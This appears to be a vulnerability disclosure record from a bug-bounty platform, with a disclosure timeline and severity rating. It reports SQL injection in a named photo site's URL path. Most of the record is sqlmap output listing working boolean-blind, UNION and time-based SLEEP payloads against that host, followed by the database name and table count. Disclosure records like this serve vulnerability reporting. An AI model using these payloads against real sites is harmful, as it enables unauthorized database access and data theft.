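2015-06-01: Details reported to the vendor; awaiting vendor response
2015-06-02: Vendor has confirmed; details disclosed to the vendor only
2015-06-12: Details disclosed to core white hats and experts in relevant fields
2015-06-22: Details disclosed to regular white hats
2015-07-02: Details disclosed to trainee white hats
2015-07-17: Details disclosed to the public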
http://photo.hsw.cn:80/Activity/index/catid/24
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://photo.hsw.cn:80/Activity/index/catid/24) AND 2978=2978 AND (5251=5251

    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: http://photo.hsw.cn:80/Activity/index/catid/24) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7173677071,0x54576a744b4d4d75536c,0x7177756271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://photo.hsw.cn:80/Activity/index/catid/24) AND SLEEP(5) AND (4494=4494
---
back-end DBMS: MySQL 5.0.11
Database: hsfoto
[115 tables]
hscenter database:
This one deserves a few more points, right~
Severity: Medium
Vulnerability Rank: 6
Confirmed at: 2015-06-02 16:23
Ah
None yet